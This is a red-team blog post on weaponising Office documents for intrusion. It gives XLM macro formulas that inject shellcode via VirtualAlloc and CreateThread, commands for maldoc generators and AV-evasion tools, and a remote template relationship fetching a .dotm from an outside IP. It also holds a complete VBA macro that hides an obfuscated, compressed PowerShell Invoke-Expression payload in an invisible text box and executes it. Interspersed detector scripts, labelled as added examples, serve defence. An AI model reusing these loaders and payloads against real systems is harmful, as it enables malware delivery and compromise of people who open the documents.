Offensive Doc Notes

No mediocrity allowed!!!!


A share given inside the team; writing it down here.

1. XLM Macro (Excel 4.0)

Unlike ordinary Office documents, the format here is XLM (not to be confused with XML). XLM was created in 1992, well before VBA.


demo:


This technique was pointed out in 2018 in this article: https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/

Many related projects have since been derived from it, for example Excel4-DCOM (https://github.com/outflanknl/Excel4-DCOM):

Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin

It, too, relies on XLM calling the Win32 API to perform remote thread injection.

SharpShooter: https://github.com/mdsecactivebreach/SharpShooter. Creating an XLS macro with this tool works as follows:

SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee

The generated SLK file looks like this:

The principle is basically the same. However, all of these are x86-based; x64 has some issues, which this article (https://www.cybereason.com/blog/excel4.0-macros-now-with-twice-the-bits) describes.

A tool that was eventually derived from that: https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a

There are of course many other related tools (Macrome: https://github.com/michaelweber/Macrome, EXCELntDonut: https://github.com/FortyNorthSecurity/EXCELntDonut), and so on.

Process injection

Since XLS supports Win32 calls, we can perform process injection and similar operations. The calling convention is as follows:

REGISTER(module_name, procedure_name, type, alias, argument, macro_type, category)

Note that x86 and x64 must be distinguished. The x86 demo is as follows:

=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)
=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)
=Valloc(0,65536,4096,64)
=SELECT(B1:B999,B1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"excel")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=WProcessMemory(-1,A10+(D1*255),ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=CThread(0,0,A10,0,0,0)
=HALT()

The x64 demo is as follows:

=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=WHILE(A22=0)
=SET.VALUE(A22,Valloc(A21,65536,12288,64))
=SET.VALUE(A21,A21+262144)
=NEXT()
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=SELECT(C1:C3479,C1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"EXCEL")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=RTL(A22+(D1*10),ACTIVE.CELL(),LEN(ACTIVE.CELL()))
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=Queue(A22,-2,0)
=Go()
=SET.VALUE(A22,0)
=HALT()
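
From the detection side, the two demos above share one tell: REGISTER calls that bind Win32 memory and thread APIs to short aliases, followed by formulas that invoke those aliases. As an added example (not from the original post, and not part of any tool named here), the following Python takes a list of XLM formulas already extracted from a sheet (for instance by olevba or a BIFF parser) and flags that pattern. The INJECTION_APIS watch-list is built from the exports registered in the x86 and x64 demos on this page; X86_DEMO is the x86 demo's formulas, one cell per entry.

```python
import re

# Watch-list built from the APIs registered in the x86/x64 demos on this page
# (constructed for this example; extend it to taste)
INJECTION_APIS = {
    "virtualalloc", "writeprocessmemory", "createthread",
    "rtlcopymemory", "queueuserapc", "nttestalert",
}

# =REGISTER("module","procedure","type_text","alias", ...)
REGISTER_RE = re.compile(
    r'^=REGISTER\(\s*"(?P<module>[^"]*)"\s*,\s*"(?P<proc>[^"]*)"\s*,'
    r'\s*"(?P<types>[^"]*)"\s*,\s*"(?P<alias>[^"]*)"',
    re.IGNORECASE,
)


def parse_registers(formulas):
    """Return one dict per REGISTER call: which DLL export is bound to which alias."""
    found = []
    for f in formulas:
        m = REGISTER_RE.match(f.strip())
        if m:
            found.append({k: m.group(k) for k in ("module", "proc", "types", "alias")})
    return found


def assess_formulas(formulas):
    """Flag REGISTER calls to injection-related APIs and the formulas that call their aliases."""
    regs = parse_registers(formulas)
    hits = [r for r in regs if r["proc"].lower() in INJECTION_APIS]
    aliases = {r["alias"] for r in hits}
    alias_calls = [
        f for f in formulas
        if any(re.match(r"^=" + re.escape(a) + r"\(", f.strip(), re.IGNORECASE) for a in aliases)
    ]
    if len(hits) >= 2:          # allocate + write/copy + execute is the loader shape
        verdict = "likely shellcode loader"
    elif hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"registered": regs, "suspicious": hits, "alias_calls": alias_calls, "verdict": verdict}


# The x86 demo from this page, as an extracted formula list (one cell per entry)
X86_DEMO = [
    '=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)',
    '=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)',
    '=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)',
    '=Valloc(0,65536,4096,64)',
    '=SELECT(B1:B999,B1)',
    '=WProcessMemory(-1,A10+(D1*255),ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)',
    '=CThread(0,0,A10,0,0,0)',
    '=HALT()',
]

if __name__ == "__main__":
    report = assess_formulas(X86_DEMO)
    print(report["verdict"])
    for r in report["suspicious"]:
        print(f'  {r["module"]}!{r["proc"]} bound to alias {r["alias"]}')
```

The alias step matters because the formulas that actually allocate, write and start the thread never mention Kernel32 themselves; a rule that only greps for "VirtualAlloc" misses a sheet where the REGISTER line sits in a far-away or hidden cell.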

For convenience, EXCELntDonut is used here to generate it. Generate the shellcode with CS and substitute it at the indicated position:

Then run:

EXCELntDonut -f exe_source.cs -r System.Windows.Forms.dll

Then insert the data and process it.

Then just execute it. Unfortunately, it kept failing during testing.

Evasion

The effect is equivalent.

Macro hiding

See the MS-XLS specification (https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/b9ec509a-235d-424e-871d-f8e721106501):

That is, change it to 02.

The hidden sheet can now no longer be unhidden.

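The hiding trick above is a single byte in the BOUNDSHEET record of the Workbook stream, so a triage script does not need Excel to see through it. As an added example (not from the original post), here is a minimal BIFF record walker in Python that reads every BoundSheet8 record, decodes the hsState bits (00 visible, 01 hidden, 02 very hidden) and the sheet type byte, and reports macro sheets that are not visible. The record layout follows MS-XLS; the SAMPLE_WORKBOOK bytes are constructed for this example and are not a real file.

```python
import struct

RECORD_BOF = 0x0809          # BIFF8 BOF
RECORD_BOUNDSHEET = 0x0085   # BoundSheet8: one per sheet, carries visibility + sheet type
RECORD_EOF = 0x000A

HS_STATE = {0x00: "visible", 0x01: "hidden", 0x02: "very hidden"}
SHEET_TYPE = {0x00: "worksheet", 0x01: "macro sheet", 0x02: "chart", 0x06: "VBA module"}


def iter_records(stream: bytes):
    """Walk BIFF records: 2-byte id, 2-byte length, then payload."""
    pos = 0
    while pos + 4 <= len(stream):
        rid, size = struct.unpack_from("<HH", stream, pos)
        yield rid, stream[pos + 4:pos + 4 + size]
        pos += 4 + size


def parse_boundsheet(payload: bytes) -> dict:
    """BoundSheet8: lbPlyPos(4) | hsState(2 bits)+unused(6 bits) | dt(1) | stName."""
    lb_ply_pos, hs_state, dt = struct.unpack_from("<IBB", payload, 0)
    cch, flags = payload[6], payload[7]          # ShortXLUnicodeString header
    if flags & 0x01:                             # fHighByte set: UTF-16LE characters
        name = payload[8:8 + 2 * cch].decode("utf-16-le")
    else:                                        # single-byte characters
        name = payload[8:8 + cch].decode("latin-1")
    return {
        "name": name,
        "offset": lb_ply_pos,
        "state": HS_STATE.get(hs_state & 0x03, "reserved"),
        "type": SHEET_TYPE.get(dt, "other"),
    }


def find_hidden_macro_sheets(workbook_stream: bytes):
    """Return (all sheets, the macro sheets whose state is anything but visible)."""
    sheets = [parse_boundsheet(p) for rid, p in iter_records(workbook_stream)
              if rid == RECORD_BOUNDSHEET]
    flagged = [s for s in sheets if s["type"] == "macro sheet" and s["state"] != "visible"]
    return sheets, flagged


# --- constructed sample stream, not a real workbook ---------------------------
def _boundsheet(name: str, hs_state: int, dt: int, offset: int) -> bytes:
    raw = name.encode("latin-1")
    body = struct.pack("<IBB", offset, hs_state, dt) + bytes([len(raw), 0x00]) + raw
    return struct.pack("<HH", RECORD_BOUNDSHEET, len(body)) + body


SAMPLE_WORKBOOK = (
    struct.pack("<HH", RECORD_BOF, 16) + bytes(16)     # BOF with placeholder payload
    + _boundsheet("Sheet1", 0x00, 0x00, 0x1000)        # ordinary visible worksheet
    + _boundsheet("Macro1", 0x02, 0x01, 0x2000)        # macro sheet set to 02 = very hidden
    + struct.pack("<HH", RECORD_EOF, 0)
)

if __name__ == "__main__":
    sheets, flagged = find_hidden_macro_sheets(SAMPLE_WORKBOOK)
    for s in sheets:
        print(f'{s["name"]:<10} {s["type"]:<12} {s["state"]}')
    print("flagged:", [s["name"] for s in flagged])
```

On a real .xls the Workbook stream sits inside the OLE compound file; olefile's OleFileIO(path).openstream("Workbook").read() returns the bytes this walker expects. A macro sheet marked 02 is exactly what the Excel UI refuses to unhide, so "macro sheet + very hidden" is a cheap, high-signal check to put in front of heavier XLM emulation.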

EPPlus: EPPlus 5 - Excel spreadsheets for .NET

EPPlus is a .NET library for generating Excel files: https://github.com/EPPlusSoftware/EPPlus

With it you can produce a modified, AV-evading Excel file; demo: https://github.com/FortyNorthSecurity/hot-manchego

Usage:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll hot-manchego.cs
hot-manchego.exe blank.xlsm vba.txt

Run the macro and get a CS session.

2. PowerPoint

This attack uses mouse actions as the trigger, such as a mouse click or mouse-over. The steps are as follows:

Insert the HTA file generated by CS. When it is clicked, the CS beacon checks in.

3. Remote document loading

Every document is a zip file: unzip it and edit the relationship entry.

Change it to:

<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://192.168.1.106/1.dotm" TargetMode="External"/>

Now open the document; once the macro runs, the beacon checks in.
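Because the whole technique is one relationship entry inside the zip, the matching detection is equally small. As an added example (not from the original post), the Python below opens a .docx without Word, walks every .rels part, and reports an attachedTemplate relationship whose external target is a web URL or UNC path. The two sample documents are constructed in memory here: one carries the relationship shown above, the other a local Normal.dotm template path (a placeholder path, not taken from the page) that a normal document may legitimately carry and that must not be flagged.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
REMOTE_PREFIXES = ("http://", "https://", "\\\\")   # web URLs and UNC paths


def find_remote_templates(docx_bytes: bytes) -> list:
    """Scan every .rels part for an attachedTemplate that points off-host."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if (rel.get("Type") == ATTACHED_TEMPLATE
                        and rel.get("TargetMode") == "External"
                        and target.lower().startswith(REMOTE_PREFIXES)):
                    findings.append({"part": part, "id": rel.get("Id"), "target": target})
    return findings


# --- constructed samples: minimal zips, not real Word output ------------------
def _build_docx(settings_rels: str) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/settings.xml",
                   '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


def _rels(target: str) -> str:
    return ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId3" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{target}" TargetMode="External"/>'
            '</Relationships>')


# The relationship from this page, pointing at a remote .dotm
MALICIOUS_DOCX = _build_docx(_rels("http://192.168.1.106/1.dotm"))
# A document whose attached template is a local Normal.dotm (placeholder path)
BENIGN_DOCX = _build_docx(
    _rels("file:///C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm"))

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_DOCX), ("benign", BENIGN_DOCX)):
        print(label, find_remote_templates(doc))
```

The scan deliberately covers every .rels part rather than only word/_rels/settings.xml.rels, since the same relationship type can be reached from other parts; filtering on the target scheme rather than on TargetMode alone keeps the everyday Normal.dotm reference out of the alert queue.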

4. Controls

Straight to the code:

Sub Main()
On Error Resume Next
createTextBoxs
ExecuteTextBoxCommands
End Sub

Sub createTextBoxs()
On Error Resume Next
Dim objTextBox As Shape
Dim secretkey As Long
Dim str As String
Dim zHf As String
Dim payload As String

payload = "H4sIAAAAAAAAAK1WaW/iShb9nPwKf4gEKCQBs4U3ivQAYzDGxmA2kxdFZbuAMuWtvGDzpv/7lA2k09PpmZZmkJCr7LucOnepq8Lw"
payload = payload + "QQ0JMkLJNSHzsIQkQK7DsLe328gxwmydLd53MHz3iGu8A9MkMAiYv29vFECAzRTvYkDebdeMMCwz+SYThGZEYOnm5vYmfxU5AdjC"
payload = payload + "dweEKIbvNgz3rhkwL0zxteN5nGsD5Lz98UcvIgQ64Xn/OIBhJwigrWMEg2KJ+Sez2kMCHya6BY2Q+Zu5e38cYFcH+CKW9oCxp6fo"
payload = payload + "OGb2bewaIDvBo+phFBYLf/1VKL0+VN8e+34EcFAsqGkQQvvRxLhQYr6VMofz1IPFgoQM4gbuNnxcIafGPi5y9HIOXjpjL5QuJ9t5"
payload = payload + "gJ7j14fMrJ51igW6VCg3nTOHhTLzmvl7fXtj/vxAM4ucENnwUXBCSFxPhSRGBgweh8AxMZzBLVUrBDRmzq5QoiAIDCPiMFcsVC92"
payload = payload + "D7B450QYl6nd19+1+1aU4fFK7u8qFT8rUSklJKXyJSd+hw4pz5uzOXqcn9B/Sq4S/f2UYKXbb1+lqgkx3IEQvoeU30+5entz85ov"
payload = payload + "IT1PUXEDlOu9MJUyI1EQIHRJmoVzTiJYevsen7Pbq2ZQ/qWh6lXronMOzxnHC/O6dJH5dntTur1kT/b+XY8QNiHJvv+6Gji4RQ7k"
payload = payload + "UgfYyLgmfPGrmMEthjkfj1cxmeIsFi4foMld2ClkhL7+rNa3Ufih2z2D6xg07gFFRVOi9COYcwyLBcGRoE35O+9pmt5taZnBq/Sl"
payload = payload + "tNKr92yf5XIPgyAoM0pE69woMyoEGJplpuME6PKpE4Vuvix8hytFOEQGCMKrubfSF5ReXPdch1ZMZNDoUhrmqgcNBHDGSpkZIhN2"
payload = payload + "UxXtrhAKX3LSAxjTkqOWYhoT+ibjQg2znCFm+d/zo/SowlCwPQxtKp13IR6DHe05l4rK0w3soFn4D7CvdXIuioyrK0mfQNMEULEb"
payload = payload + "lpklIiHta4XyT4n3v8H7scX8ALNH4CWQxbwQhS1t6OcuQNkJ0Ik2Y+gzz6WsBF+7aZjVUm7GyK6blw+ic1pJSJV44tpdEMBmXc17"
payload = payload + "XLFQY6Nd0lbGzVSyBHaUao6cGM6S9GN+AJr7ZMpGrjEPiT/sc3Q/M9ggwAPs6fuxD5KxZSXt3jrtKx12jJqogYRo3D05PDJsqjed"
payload = payload + "uNqsTYRY5l0ctMQev1oAZPm5r8iuV80+SMcno7knExa62lH2hVjpmKvYaNqiyzdDqruM+pFH+tFE0aKxP7YFVN/H3DIcxcLgeSiy"
payload = payload + "GnjGegvm+qaf+dL8XQyy/amd7ZHfgyTzo1H2Ya3ahKtRS3M8BFfR7nSUkWGeOMiO6PvIlQwvqMknY3s4WMCrLtRDVZwvNmvKTRX4"
payload = payload + "hNebRNU8HC87i0NN2ZAcW8xTjHKGExns6KR5h4259Ps1RRcWQ0z8aITsp2kqpBcZe5Sqapc+xY0p+s8N88SmQ68OmgRRThPqp5Xx"
payload = payload + "aywCS1hNHGPNI9vYs9zMMtp25Dco7vpQHonrhPjhiPgx9hsTxchw53qZ/LSOJ1Uq7+vWWAT3ApIs0D4FYxHG2TpVODFJBUt4jrqZ"
payload = payload + "HjdIsL48WF61Dpsjh8XTNteWoCfaUjxTm7Mu6K6T+27aHyxUMx0kHW4trp86+nbnBq2DI3X1eijMOi2LsLzJpz01RYcnvD7E7Hij"
payload = payload + "zPGgsmhMogrkYCqzi/5mxtmj/uxQXQ+mcjTnsTivtHtcV5P7R2k87SeTRWW0Vg+8MtvvON3p+pudBLiZpHVqMxoPU1ryHU5fGxw/"
payload = payload + "raiDjlxbLLxhZu9sw41EVe6tZ5u+IE3WvV2j20Lb0xPeWa1D41CVN+0F2R21mWDp3hYE7BE1gHrfirzOXN427bm7ZTdNQYOVJQSg"
payload = payload + "eqqAlup3dhOzJ676+/V4IdaaRnP69BwYadVSWEGdP8faUF7K4ux5GRw30ugETZ+7r7DcWtr5glLbhEHYqlYPykwTLHmkVO6TrZxU"
payload = payload + "HWEyu190h9I8iWuidtQAqVQr3LY+8AbcsO1BzK0XVb/fdNd7rr6vI3u8DFvjCm0fdrNXc+yFtnna1FyV666D8XxUG+0loOimtrfm"
payload = payload + "aNDg96fB0FdOvUa9Fh/1+kpqrCSho1U7w+kgGdvyuj4YidOBYGlebY5dvnrOaX9Dc5XWqKgLp6xWRaDlNStuYN08JuGJBa3u0RhE"
payload = payload + "fkL/FZqT9ysqe8xkfJ+leS3pK/9I8xo0OafT1K1lY8n7vRkRoh6te70Ca2ELpJolULvGPTeO5ZZR6wqgT+PJzwK5v6uo/WRhGcg3"
payload = payload + "5ruXl7xVbl1Cp58kmyj+wdDnAw6Zj4ZH2xxtr9n7+/u8Jd58fHq9S96uY+TH/kFPqLla4/bm23VeiMGnrvmr6UwCJNgDTLspnbCu"
payload = payload + "9yPvEv4yJykuyjSKxa9H+wMkDsR07KWD8fVW6WDsGtlk94sR68+Pvk9vzwVd1tgvV6XvF0SpdL369Gi7zcefyxGvU+D3q2RDz1f+"
payload = payload + "ROQYOrtwX2YqSa1SqWTPeoVa+31ieq6XFj/slbP57xOUz65w7upjYCORY8P/Ywx+8Prf2c34y2fI7+zliL6mLLuU/wU5qB694w0A"
payload = payload + "AA=="


zHf = " -NoP -NonI -Command ""Invoke-"
zHf = zHf + "Expression $(New-Object IO.StreamReader ($(New-O"
zHf = zHf + "bject IO.Compression.DeflateStream ($(New-Object"
zHf = zHf + " IO.MemoryStream (,$([Convert]::FromBase64String"
zHf = zHf + "(\"" " & payload & " \"" )))), [IO.Compression.Compr"
zHf = zHf + "essionMode]::Decompress)), [Text.Encoding]::ASCI"
zHf = zHf + "I)).ReadToEnd();Read-Host;"""

secretkey = RGB(1, 33, 7)
Debug.Print "Adding Embedded Command Shape Into Document"
Set objTextBox = ActiveDocument.Shapes.AddTextbox(msoTextOrientationHorizontal, 0, 0, 0, 0)
With objTextBox
.TextFrame.TextRange.Text = "powershell.exe|" + zHf + "|open|1"
.Name = "Shell.Application"
.Height = 1
.Width = 1
.Visible = msoFalse
.Shadow.Visible = True
.Shadow.ForeColor.RGB = secretkey
If .Shadow.ForeColor.RGB <> secretkey Then
Debug.Print "Fail to set secret key"
End If
Debug.Print "Secret Key For Command Shape: " & CStr(.Shadow.ForeColor.RGB)
.AlternativeText = "ShellExecute"
.TextFrame.TextRange.Font.TextColor.RGB = ActiveDocument.Background.Fill.BackColor
End With
End Sub

Sub ExecuteTextBoxCommands()
On Error Resume Next
Dim objCmdShape As Shape
Dim secretkey As Long
Dim cmdParams() As String
Dim cmdCommand As String
Dim cmdType As String
Dim cmdObj As Object
secretkey = RGB(1, 33, 7)
For x = 1 To ActiveDocument.Shapes.Count
Set objCmdShape = ActiveDocument.Shapes(x)
If objCmdShape.Shadow.ForeColor.RGB = secretkey Then
Debug.Print "Discovered Command Text Object"
cmdType = objCmdShape.Name
cmdCommand = objCmdShape.AlternativeText
cmdParams = Split(objCmdShape.TextFrame.TextRange.Text, "|")
Debug.Print "Command Type To Execute: " & cmdType
Debug.Print "Command To Execute: " & cmdCommand
Debug.Print "Command Params to Execute: " & Join(cmdParams, " & ")
Set cmdObj = Interaction.CreateObject(cmdType)
VBA$.[Interaction].CallByName! cmdObj, [cmdCommand], VbMethod, cmdParams(0), cmdParams(1), cmdParams(2)
objCmdShape.Delete
ActiveDocument.Save
Exit For
End If
Next
End Sub

Not much to say here: it uses a control to execute the specified program.

5. VBA Stomping

The name translates literally as "stomping" on the VBA. How to understand it? Say we create a basic piece of VBA code:


When we unzip the document and fill it with zeros, it can still execute, like this:

Change it to:

It still works.

Weaponized: https://github.com/outflanknl/EvilClippy

Compile command:

csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs

Usage:

EvilClippy.exe -s fakecode.vba macrofile.doc
EvilClippy.exe -s fakecode.vba -t 2016x86 macrofile.doc

6. VBA Purging

Weaponized: https://github.com/fireeye/OfficePurge

OfficePurge.exe -d word -f .\malicious.doc -m NewMacros
OfficePurge.exe -d excel -f .\payroll.xls -m Module1
OfficePurge.exe -d publisher -f .\donuts.pub -m ThisDocument
OfficePurge.exe -d word -f .\malicious.doc -l
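
Sections 5 and 6 both work on the same structure: a VBA module stream is p-code followed by an MS-OVBA CompressedContainer holding the source, with the container's start given by the dir stream's MODULEOFFSET. Stomping overwrites that container (the zero-fill shown above), purging removes it, and Office happily runs the remaining p-code. As an added example (not from the original post and not part of EvilClippy or OfficePurge), the Python below implements the MS-OVBA decompression algorithm and classifies a module stream as intact source, attributes-only source, an invalid container, or no source at all. The module streams here are constructed: FAKE_PCODE stands in for the opaque p-code, and compress_literals is a deliberately naive, literal-only encoder used only to build the test data.

```python
# MS-OVBA module stream: [performance cache (p-code)][CompressedContainer with source]
ATTRIBUTE_PREFIX = "Attribute "


def decompress_container(container: bytes) -> bytes:
    """Decompress an MS-OVBA CompressedContainer (section 2.4.1.3): 0x01 signature, then chunks."""
    if not container or container[0] != 0x01:
        raise ValueError("not a CompressedContainer: signature byte 0x01 missing")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(container):
        header = int.from_bytes(container[pos:pos + 2], "little")
        size = (header & 0x0FFF) + 3               # CompressedChunkSize, header included
        is_compressed = bool(header & 0x8000)      # CompressedChunkFlag
        data = container[pos + 2:pos + size]
        pos += size
        chunk_start = len(out)
        if not is_compressed:                      # raw chunk: up to 4096 literal bytes
            out += data[:4096]
            continue
        i = 0
        while i < len(data):
            flags = data[i]
            i += 1
            for bit in range(8):                   # one flag bit per token, LSB first
                if i >= len(data):
                    break
                if not (flags >> bit) & 1:         # LiteralToken: copy one byte
                    out.append(data[i])
                    i += 1
                else:                              # CopyToken: back-reference within this chunk
                    token = int.from_bytes(data[i:i + 2], "little")
                    i += 2
                    diff = len(out) - chunk_start
                    bit_count = max((diff - 1).bit_length(), 4)   # ceil(log2(diff)), at least 4
                    length = (token & (0xFFFF >> bit_count)) + 3
                    offset = (token >> (16 - bit_count)) + 1
                    src = len(out) - offset
                    for _ in range(length):
                        out.append(out[src])
                        src += 1
    return bytes(out)


def compress_literals(data: bytes) -> bytes:
    """Valid but naive container (literal tokens only); used here to build test streams."""
    out = bytearray(b"\x01")
    for start in range(0, len(data), 3584):        # 3584 literals + 448 flag bytes fit one chunk
        chunk = data[start:start + 3584]
        body = bytearray()
        for j in range(0, len(chunk), 8):
            body.append(0x00)                      # flag byte: all eight tokens are literals
            body += chunk[j:j + 8]
        header = ((2 + len(body) - 3) & 0x0FFF) | 0x3000 | 0x8000
        out += header.to_bytes(2, "little") + body
    return bytes(out)


def classify_module(module_stream: bytes, module_offset: int) -> dict:
    """Classify the source half of a module stream; module_offset is the dir-stream MODULEOFFSET."""
    if module_offset >= len(module_stream):
        return {"status": "no-source", "text": ""}          # purged: only p-code remains
    try:
        text = decompress_container(module_stream[module_offset:]).decode("latin-1")
    except ValueError:
        return {"status": "invalid-container", "text": ""}  # overwritten, e.g. zero-filled
    lines = [l for l in text.splitlines() if l.strip()]
    code = [l for l in lines if not l.startswith(ATTRIBUTE_PREFIX)]
    return {"status": "source" if code else "attributes-only", "text": text}


# --- constructed samples --------------------------------------------------------
FAKE_PCODE = bytes(32)                                     # stands in for the opaque p-code
SOURCE = b'Attribute VB_Name = "Module1"\r\nSub AutoOpen()\r\n    MsgBox "demo"\r\nEnd Sub\r\n'
INTACT_MODULE = FAKE_PCODE + compress_literals(SOURCE)
STOMPED_MODULE = FAKE_PCODE + bytes(len(compress_literals(SOURCE)))   # source zero-filled
PURGED_MODULE = FAKE_PCODE                                  # container removed entirely
MODULE_OFFSET = len(FAKE_PCODE)

# Hand-built chunk exercising a CopyToken: literals "abc", then copy(offset 3, length 6)
COPYTOKEN_SAMPLE = b"\x01\x05\xb0\x08abc\x03\x20"

if __name__ == "__main__":
    print(decompress_container(COPYTOKEN_SAMPLE))
    for name, stream in (("intact", INTACT_MODULE), ("stomped", STOMPED_MODULE), ("purged", PURGED_MODULE)):
        print(name, classify_module(stream, MODULE_OFFSET)["status"])
```

"no-source" and "invalid-container" are the direct fingerprints of purging and of the zero-fill stomp shown above. A stomp that replaces the source with different but valid VBA (EvilClippy's -s fakecode.vba) still classifies as "source"; catching that requires disassembling the p-code and comparing it with the decompressed text, which is what pcodedmp-based tooling does and is out of scope here.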

Title: Offensive Doc Notes

Author: 冷逸

Published: January 31, 2021 - 15:01

Last updated: January 31, 2021 - 15:01

Original link: https://lengjibo.github.io/offendoc/

License: Attribution-NonCommercial-NoDerivatives 4.0 International. When reposting, keep the original link and author.
